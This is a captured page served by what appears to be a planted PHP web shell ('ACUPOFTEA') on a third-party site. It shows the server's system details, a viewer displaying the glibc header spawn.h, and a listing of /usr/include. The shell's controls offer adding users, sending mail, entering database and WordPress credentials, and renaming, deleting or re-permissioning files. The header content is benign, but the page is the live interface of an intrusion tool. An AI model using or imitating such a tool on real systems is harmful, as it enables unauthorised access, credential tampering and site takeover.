System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
200.10.71.112
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
spawn.h
/* Definitions for POSIX spawn interface. Copyright (C) 2000-2022 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <https://www.gnu.org/licenses/>. */ #ifndef _SPAWN_H #define _SPAWN_H 1 #include <features.h> #include <sched.h> #include <sys/types.h> #include <bits/types/sigset_t.h> /* Data structure to contain attributes for thread creation. */ typedef struct { short int __flags; pid_t __pgrp; sigset_t __sd; sigset_t __ss; struct sched_param __sp; int __policy; int __pad[16]; } posix_spawnattr_t; /* Data structure to contain information about the actions to be performed in the new process with respect to file descriptors. */ typedef struct { int __allocated; int __used; struct __spawn_action *__actions; int __pad[16]; } posix_spawn_file_actions_t; /* Flags to be set in the `posix_spawnattr_t'. */ #define POSIX_SPAWN_RESETIDS 0x01 #define POSIX_SPAWN_SETPGROUP 0x02 #define POSIX_SPAWN_SETSIGDEF 0x04 #define POSIX_SPAWN_SETSIGMASK 0x08 #define POSIX_SPAWN_SETSCHEDPARAM 0x10 #define POSIX_SPAWN_SETSCHEDULER 0x20 #ifdef __USE_GNU # define POSIX_SPAWN_USEVFORK 0x40 # define POSIX_SPAWN_SETSID 0x80 #endif __BEGIN_DECLS /* Spawn a new process executing PATH with the attributes describes in *ATTRP. Before running the process perform the actions described in FILE-ACTIONS. This function is a possible cancellation point and therefore not marked with __THROW. */ extern int posix_spawn (pid_t *__restrict __pid, const char *__restrict __path, const posix_spawn_file_actions_t *__restrict __file_actions, const posix_spawnattr_t *__restrict __attrp, char *const __argv[__restrict_arr], char *const __envp[__restrict_arr]) __nonnull ((2, 5)); /* Similar to `posix_spawn' but search for FILE in the PATH. This function is a possible cancellation point and therefore not marked with __THROW. */ extern int posix_spawnp (pid_t *__pid, const char *__file, const posix_spawn_file_actions_t *__file_actions, const posix_spawnattr_t *__attrp, char *const __argv[], char *const __envp[]) __nonnull ((2, 5)); /* Initialize data structure with attributes for `spawn' to default values. */ extern int posix_spawnattr_init (posix_spawnattr_t *__attr) __THROW __nonnull ((1)); /* Free resources associated with ATTR. */ extern int posix_spawnattr_destroy (posix_spawnattr_t *__attr) __THROW __nonnull ((1)); /* Store signal mask for signals with default handling from ATTR in SIGDEFAULT. */ extern int posix_spawnattr_getsigdefault (const posix_spawnattr_t * __restrict __attr, sigset_t *__restrict __sigdefault) __THROW __nonnull ((1, 2)); /* Set signal mask for signals with default handling in ATTR to SIGDEFAULT. */ extern int posix_spawnattr_setsigdefault (posix_spawnattr_t *__restrict __attr, const sigset_t *__restrict __sigdefault) __THROW __nonnull ((1, 2)); /* Store signal mask for the new process from ATTR in SIGMASK. */ extern int posix_spawnattr_getsigmask (const posix_spawnattr_t *__restrict __attr, sigset_t *__restrict __sigmask) __THROW __nonnull ((1, 2)); /* Set signal mask for the new process in ATTR to SIGMASK. */ extern int posix_spawnattr_setsigmask (posix_spawnattr_t *__restrict __attr, const sigset_t *__restrict __sigmask) __THROW __nonnull ((1, 2)); /* Get flag word from the attribute structure. */ extern int posix_spawnattr_getflags (const posix_spawnattr_t *__restrict __attr, short int *__restrict __flags) __THROW __nonnull ((1, 2)); /* Store flags in the attribute structure. */ extern int posix_spawnattr_setflags (posix_spawnattr_t *_attr, short int __flags) __THROW __nonnull ((1)); /* Get process group ID from the attribute structure. */ extern int posix_spawnattr_getpgroup (const posix_spawnattr_t *__restrict __attr, pid_t *__restrict __pgroup) __THROW __nonnull ((1, 2)); /* Store process group ID in the attribute structure. */ extern int posix_spawnattr_setpgroup (posix_spawnattr_t *__attr, pid_t __pgroup) __THROW __nonnull ((1)); /* Get scheduling policy from the attribute structure. */ extern int posix_spawnattr_getschedpolicy (const posix_spawnattr_t * __restrict __attr, int *__restrict __schedpolicy) __THROW __nonnull ((1, 2)); /* Store scheduling policy in the attribute structure. */ extern int posix_spawnattr_setschedpolicy (posix_spawnattr_t *__attr, int __schedpolicy) __THROW __nonnull ((1)); /* Get scheduling parameters from the attribute structure. */ extern int posix_spawnattr_getschedparam (const posix_spawnattr_t * __restrict __attr, struct sched_param *__restrict __schedparam) __THROW __nonnull ((1, 2)); /* Store scheduling parameters in the attribute structure. */ extern int posix_spawnattr_setschedparam (posix_spawnattr_t *__restrict __attr, const struct sched_param * __restrict __schedparam) __THROW __nonnull ((1, 2)); /* Initialize data structure for file attribute for `spawn' call. */ extern int posix_spawn_file_actions_init (posix_spawn_file_actions_t * __file_actions) __THROW __nonnull ((1)); /* Free resources associated with FILE-ACTIONS. */ extern int posix_spawn_file_actions_destroy (posix_spawn_file_actions_t * __file_actions) __THROW __nonnull ((1)); /* Add an action to FILE-ACTIONS which tells the implementation to call `open' for the given file during the `spawn' call. */ extern int posix_spawn_file_actions_addopen (posix_spawn_file_actions_t * __restrict __file_actions, int __fd, const char *__restrict __path, int __oflag, mode_t __mode) __THROW __nonnull ((1, 3)); /* Add an action to FILE-ACTIONS which tells the implementation to call `close' for the given file descriptor during the `spawn' call. */ extern int posix_spawn_file_actions_addclose (posix_spawn_file_actions_t * __file_actions, int __fd) __THROW __nonnull ((1)); /* Add an action to FILE-ACTIONS which tells the implementation to call `dup2' for the given file descriptors during the `spawn' call. */ extern int posix_spawn_file_actions_adddup2 (posix_spawn_file_actions_t * __file_actions, int __fd, int __newfd) __THROW __nonnull ((1)); #ifdef __USE_GNU /* Add an action changing the directory to PATH during spawn. This affects the subsequent file actions. */ extern int posix_spawn_file_actions_addchdir_np (posix_spawn_file_actions_t * __restrict __actions, const char *__restrict __path) __THROW __nonnull ((1, 2)); /* Add an action changing the directory to FD during spawn. This affects the subsequent file actions. FD is not duplicated and must be open when the file action is executed. */ extern int posix_spawn_file_actions_addfchdir_np (posix_spawn_file_actions_t *, int __fd) __THROW __nonnull ((1)); /* Add an action to close all file descriptor greater than or equal to FROM during spawn. This affects the subsequent file actions. */ extern int posix_spawn_file_actions_addclosefrom_np (posix_spawn_file_actions_t *, int __from) __THROW __nonnull ((1)); /* Add an action to set the process group of the forground process group associated with the terminal TCFD. */ extern int posix_spawn_file_actions_addtcsetpgrp_np (posix_spawn_file_actions_t *, int __tcfd) __THROW __nonnull ((1)); #endif __END_DECLS #endif /* spawn.h */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
arpa
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
asm-generic
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
c++
DIR
-
drwxr-xr-x
2024-11-27 09:06:33
drm
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
finclude
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
iproute2
DIR
-
drwxr-xr-x
2026-07-02 06:05:49
libdmmp
DIR
-
drwxr-xr-x
2024-02-16 06:53:04
linux
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
misc
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
mtd
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
net
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netash
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netatalk
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netax25
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
neteconet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netinet
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netipx
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netiucv
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netpacket
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrom
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
netrose
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
nfs
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
node
DIR
-
drwxr-xr-x
2025-04-08 05:12:47
protocols
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rdma
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
rpc
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
rpcsvc
DIR
-
drwxr-xr-x
2024-11-27 09:06:31
scsi
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
sound
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
tirpc
DIR
-
drwxr-xr-x
2024-11-27 09:06:30
video
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
x86_64-linux-gnu
DIR
-
drwxr-xr-x
2026-07-27 07:22:30
xen
DIR
-
drwxr-xr-x
2026-08-05 11:05:03
xfs
DIR
-
drwxr-xr-x
2022-02-09 04:42:33
aio.h
text/x-c
7.56 KB
-rw-r--r--
2026-07-24 12:11:17
aliases.h
text/x-c
1.98 KB
-rw-r--r--
2026-07-24 12:11:17
alloca.h
text/x-c
1.17 KB
-rw-r--r--
2026-07-24 12:11:17
ar.h
text/x-c
1.69 KB
-rw-r--r--
2026-07-24 12:11:17
argp.h
text/x-c
24.95 KB
-rw-r--r--
2026-07-24 12:11:17
argz.h
text/x-c
5.91 KB
-rw-r--r--
2026-07-24 12:11:17
assert.h
text/x-c
4.53 KB
-rw-r--r--
2026-07-24 12:11:17
byteswap.h
text/x-c
1.42 KB
-rw-r--r--
2026-07-24 12:11:17
complex.h
text/x-c
7.95 KB
-rw-r--r--
2026-07-24 12:11:17
cpio.h
text/x-c
2.21 KB
-rw-r--r--
2026-07-24 12:11:17
crypt.h
text/x-c
10.87 KB
-rw-r--r--
2021-12-17 10:48:21
ctype.h
text/x-c
10.71 KB
-rw-r--r--
2026-07-24 12:11:17
dirent.h
text/x-c
12.22 KB
-rw-r--r--
2026-07-24 12:11:17
dlfcn.h
text/x-c
8.17 KB
-rw-r--r--
2026-07-24 12:11:17
elf.h
text/x-c
179.98 KB
-rw-r--r--
2026-07-24 12:11:17
endian.h
text/x-c
2.25 KB
-rw-r--r--
2026-07-24 12:11:17
envz.h
text/x-c
2.8 KB
-rw-r--r--
2026-07-24 12:11:17
err.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
errno.h
text/x-c
1.64 KB
-rw-r--r--
2026-07-24 12:11:17
error.h
text/x-c
2.36 KB
-rw-r--r--
2026-07-24 12:11:17
execinfo.h
text/x-c
1.49 KB
-rw-r--r--
2026-07-24 12:11:17
fcntl.h
text/x-c
9.89 KB
-rw-r--r--
2026-07-24 12:11:17
features-time64.h
text/x-c
1.38 KB
-rw-r--r--
2026-07-24 12:11:17
features.h
text/x-c
17.44 KB
-rw-r--r--
2026-07-24 12:11:17
fenv.h
text/x-c
5.65 KB
-rw-r--r--
2026-07-24 12:11:17
fmtmsg.h
text/x-c
3.16 KB
-rw-r--r--
2026-07-24 12:11:17
fnmatch.h
text/x-c
2.24 KB
-rw-r--r--
2026-07-24 12:11:17
fstab.h
text/x-c
3.04 KB
-rw-r--r--
2026-07-24 12:11:17
fts.h
text/x-c
9.35 KB
-rw-r--r--
2026-07-24 12:11:17
ftw.h
text/x-c
6.19 KB
-rw-r--r--
2026-07-24 12:11:17
gawkapi.h
text/x-c
39.69 KB
-rw-r--r--
2026-07-20 10:38:47
gconv.h
text/x-c
4.11 KB
-rw-r--r--
2026-07-24 12:11:17
getopt.h
text/x-c
1.43 KB
-rw-r--r--
2026-07-24 12:11:17
glob.h
text/x-c
7.13 KB
-rw-r--r--
2026-07-24 12:11:17
gnu-versions.h
text/x-c
2.29 KB
-rw-r--r--
2026-07-24 12:11:17
gnumake.h
text/x-c
2.84 KB
-rw-r--r--
2022-02-15 03:32:21
grp.h
text/x-c
6.53 KB
-rw-r--r--
2026-07-24 12:11:17
gshadow.h
text/x-c
4.42 KB
-rw-r--r--
2026-07-24 12:11:17
iconv.h
text/x-c
1.81 KB
-rw-r--r--
2026-07-24 12:11:17
ifaddrs.h
text/x-c
2.77 KB
-rw-r--r--
2026-07-24 12:11:17
inttypes.h
text/x-c
8.14 KB
-rw-r--r--
2026-07-24 12:11:17
langinfo.h
text/x-c
17.43 KB
-rw-r--r--
2026-07-24 12:11:17
lastlog.h
text/x-c
126 B
-rw-r--r--
2026-07-24 12:11:17
libgen.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
libintl.h
text/x-c
4.47 KB
-rw-r--r--
2026-07-24 12:11:17
limits.h
text/x-c
5.57 KB
-rw-r--r--
2026-07-24 12:11:17
link.h
text/x-c
7.62 KB
-rw-r--r--
2026-07-24 12:11:17
locale.h
text/x-c
7.5 KB
-rw-r--r--
2026-07-24 12:11:17
malloc.h
text/x-c
5.84 KB
-rw-r--r--
2026-07-24 12:11:17
math.h
text/x-c
48.7 KB
-rw-r--r--
2026-07-24 12:11:17
mcheck.h
text/x-c
2.38 KB
-rw-r--r--
2026-07-24 12:11:17
memory.h
text/x-c
956 B
-rw-r--r--
2026-07-24 12:11:17
mntent.h
text/x-c
3.28 KB
-rw-r--r--
2026-07-24 12:11:17
monetary.h
text/x-c
1.92 KB
-rw-r--r--
2026-07-24 12:11:17
mpath_cmd.h
text/x-c
4.06 KB
-rw-r--r--
2023-10-31 10:21:59
mpath_persist.h
text/x-c
11.22 KB
-rw-r--r--
2023-10-31 10:21:59
mqueue.h
text/x-c
4.5 KB
-rw-r--r--
2026-07-24 12:11:17
netdb.h
text/x-c
27.79 KB
-rw-r--r--
2026-07-24 12:11:17
nl_types.h
text/x-c
1.71 KB
-rw-r--r--
2026-07-24 12:11:17
nss.h
text/x-c
14.07 KB
-rw-r--r--
2026-07-24 12:11:17
obstack.h
text/x-c
20.81 KB
-rw-r--r--
2026-07-24 12:11:17
paths.h
text/x-c
2.91 KB
-rw-r--r--
2026-07-24 12:11:17
poll.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
printf.h
text/x-c
6.71 KB
-rw-r--r--
2026-07-24 12:11:17
proc_service.h
text/x-c
3.4 KB
-rw-r--r--
2026-07-24 12:11:17
pthread.h
text/x-c
47.24 KB
-rw-r--r--
2026-07-24 12:11:17
pty.h
text/x-c
1.53 KB
-rw-r--r--
2026-07-24 12:11:17
pwd.h
text/x-c
6.17 KB
-rw-r--r--
2026-07-24 12:11:17
re_comp.h
text/x-c
963 B
-rw-r--r--
2026-07-24 12:11:17
regex.h
text/x-c
25.3 KB
-rw-r--r--
2026-07-24 12:11:17
regexp.h
text/x-c
1.35 KB
-rw-r--r--
2026-07-24 12:11:17
resolv.h
text/x-c
11.96 KB
-rw-r--r--
2026-07-24 12:11:17
sched.h
text/x-c
4.92 KB
-rw-r--r--
2026-07-24 12:11:17
search.h
text/x-c
5.32 KB
-rw-r--r--
2026-07-24 12:11:17
semaphore.h
text/x-c
3.38 KB
-rw-r--r--
2026-07-24 12:11:17
setjmp.h
text/x-c
3.12 KB
-rw-r--r--
2026-07-24 12:11:17
sgtty.h
text/x-c
1.31 KB
-rw-r--r--
2026-07-24 12:11:17
shadow.h
text/x-c
5.34 KB
-rw-r--r--
2026-07-24 12:11:17
signal.h
text/x-c
12.73 KB
-rw-r--r--
2026-07-24 12:11:17
spawn.h
text/x-c
8.08 KB
-rw-r--r--
2026-07-24 12:11:17
stab.h
text/x-c
264 B
-rw-r--r--
2026-07-24 12:11:17
stdc-predef.h
text/x-c
2.4 KB
-rw-r--r--
2026-07-24 12:11:17
stdint.h
text/x-c
8.28 KB
-rw-r--r--
2026-07-24 12:11:17
stdio.h
text/x-c
30.45 KB
-rw-r--r--
2026-07-24 12:11:17
stdio_ext.h
text/x-c
2.73 KB
-rw-r--r--
2026-07-24 12:11:17
stdlib.h
text/x-c
35.54 KB
-rw-r--r--
2026-07-24 12:11:17
string.h
text/x-c
19 KB
-rw-r--r--
2026-07-24 12:11:17
strings.h
text/x-c
4.64 KB
-rw-r--r--
2026-07-24 12:11:17
sudo_plugin.h
text/x-c
11.64 KB
-rw-r--r--
2026-03-02 01:08:06
syscall.h
text/x-c
25 B
-rw-r--r--
2026-07-24 12:11:17
sysexits.h
text/x-c
5.11 KB
-rw-r--r--
2026-07-24 12:11:17
syslog.h
text/x-c
24 B
-rw-r--r--
2026-07-24 12:11:17
tar.h
text/x-c
3.66 KB
-rw-r--r--
2026-07-24 12:11:17
termio.h
text/x-c
214 B
-rw-r--r--
2026-07-24 12:11:17
termios.h
text/x-c
3.51 KB
-rw-r--r--
2026-07-24 12:11:17
tgmath.h
text/x-c
43.61 KB
-rw-r--r--
2026-07-24 12:11:17
thread_db.h
text/x-c
15.65 KB
-rw-r--r--
2026-07-24 12:11:17
threads.h
text/x-c
7.51 KB
-rw-r--r--
2026-07-24 12:11:17
time.h
text/x-c
14.49 KB
-rw-r--r--
2026-07-24 12:11:17
ttyent.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
uchar.h
text/x-c
1.96 KB
-rw-r--r--
2026-07-24 12:11:17
ucontext.h
text/x-c
1.99 KB
-rw-r--r--
2026-07-24 12:11:17
ulimit.h
text/x-c
1.55 KB
-rw-r--r--
2026-07-24 12:11:17
unistd.h
text/x-c
43.91 KB
-rw-r--r--
2026-07-24 12:11:17
utime.h
text/x-c
1.86 KB
-rw-r--r--
2026-07-24 12:11:17
utmp.h
text/x-c
3.15 KB
-rw-r--r--
2026-07-24 12:11:17
utmpx.h
text/x-c
4 KB
-rw-r--r--
2026-07-24 12:11:17
values.h
text/x-c
1.91 KB
-rw-r--r--
2026-07-24 12:11:17
wait.h
text/x-c
22 B
-rw-r--r--
2026-07-24 12:11:17
wchar.h
text/x-c
31.05 KB
-rw-r--r--
2026-07-24 12:11:17
wctype.h
text/x-c
5.42 KB
-rw-r--r--
2026-07-24 12:11:17
wordexp.h
text/x-c
2.44 KB
-rw-r--r--
2026-07-24 12:11:17
~ ACUPOFTEA - www.loginstore.com